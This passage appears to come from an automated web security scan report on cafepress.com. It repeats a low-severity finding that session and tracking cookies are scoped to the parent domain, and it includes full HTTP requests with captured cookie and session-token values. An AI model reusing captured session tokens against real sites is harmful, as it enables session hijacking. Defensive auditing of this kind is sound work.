__utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; 
cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW20 Cteonnt-Length: 93204 Date: Sun, 26 Dec 2010 13:49:11 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:19:11 GMT; path=/ Set-Cookie: cp_sc=100007; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:19:11 GMT; path=/ Set-Cookie: cppss=3x0; domain=cafepress.com; path=/Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 93204 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/...[SNIP]...
2.17. http://www.cafepress.com/+framed-prints
Summary
Severity: Low
Confidence: Firm
Host: http://www.cafepress.com
Path: /+framed-prints
Issue detail
The following cookies were issued by the application and are scoped to a parent of the issuing domain:
ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
cp_sc=100169; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:17 GMT; path=/
The highlighted cookie (ASP.NET_SessionId) appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /+framed-prints HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; 
cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW28 ntCoent-Length: 63735 Date: Sun, 26 Dec 2010 13:48:18 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:17 GMT; path=/ Set-Cookie: cp_sc=100169; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:17 GMT; path=/ Set-Cookie: cppss=3x0; domain=cafepress.com; path=/Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 63735 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta h...[SNIP]...
2.18. http://www.cafepress.com/+greeting_cards
Summary
Severity: Low
Confidence: Firm
Host: http://www.cafepress.com
Path: /+greeting_cards
Issue detail
The following cookies were issued by the application and are scoped to a parent of the issuing domain:
ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
cp_sc=100148; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:50 GMT; path=/
The highlighted cookie (ASP.NET_SessionId) appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /+greeting_cards HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; 
cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW28 ntCoent-Length: 59651 Date: Sun, 26 Dec 2010 13:48:50 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:50 GMT; path=/ Set-Cookie: cp_sc=100148; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:50 GMT; path=/ Set-Cookie: cppss=3x0; domain=cafepress.com; path=/Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 59651 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta h...[SNIP]...
2.19. http://www.cafepress.com/+hats-caps
Summary
Severity: Low
Confidence: Firm
Host: http://www.cafepress.com
Path: /+hats-caps
Issue detail
The following cookies were issued by the application and are scoped to a parent of the issuing domain:
ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
cp_sc=100245; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:16:50 GMT; path=/
The highlighted cookie (ASP.NET_SessionId) appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /+hats-caps HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; 
cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW28 ntCoent-Length: 59393 Date: Sun, 26 Dec 2010 13:46:51 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:16:50 GMT; path=/ Set-Cookie: cp_sc=100245; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:16:50 GMT; path=/ Set-Cookie: cppss=3x0; domain=cafepress.com; path=/Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 59393 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta h...[SNIP]...
2.20. http://www.cafepress.com/+ipad-cases
Summary
Severity: Low
Confidence: Firm
Host: http://www.cafepress.com
Path: /+ipad-cases
Issue detail
The following cookies were issued by the application and are scoped to a parent of the issuing domain:
ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
cp_sc=202454; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:14:48 GMT; path=/
The highlighted cookie (ASP.NET_SessionId) appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /+ipad-cases HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; 
cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW21 Cteonnt-Length: 88266 Date: Sun, 26 Dec 2010 13:44:49 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:14:48 GMT; path=/ Set-Cookie: cp_sc=202454; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:14:48 GMT; path=/ Set-Cookie: cppss=3x0; domain=cafepress.com; path=/Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 88266 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta h...[SNIP]...
2.21. http://www.cafepress.com/+iphone-cases
Summary
Severity: Low
Confidence: Firm
Host: http://www.cafepress.com
Path: /+iphone-cases
Issue detail
The following cookies were issued by the application and are scoped to a parent of the issuing domain:
ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
cp_sc=202063; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:28 GMT; path=/
The highlighted cookie (ASP.NET_SessionId) appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /+iphone-cases HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; 
cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW12 Cteonnt-Length: 65212 Date: Sun, 26 Dec 2010 13:48:28 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:28 GMT; path=/ Set-Cookie: cp_sc=202063; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:28 GMT; path=/ Set-Cookie: cppss=3x0; domain=cafepress.com; path=/Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 65212 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta h...[SNIP]...
2.22. http://www.cafepress.com/+journals
Summary
Severity: Low
Confidence: Firm
Host: http://www.cafepress.com
Path: /+journals
Issue detail
The following cookies were issued by the application and are scoped to a parent of the issuing domain:
ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
cp_sc=100229; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:47 GMT; path=/
The highlighted cookie (ASP.NET_SessionId) appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /+journals HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; 
cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
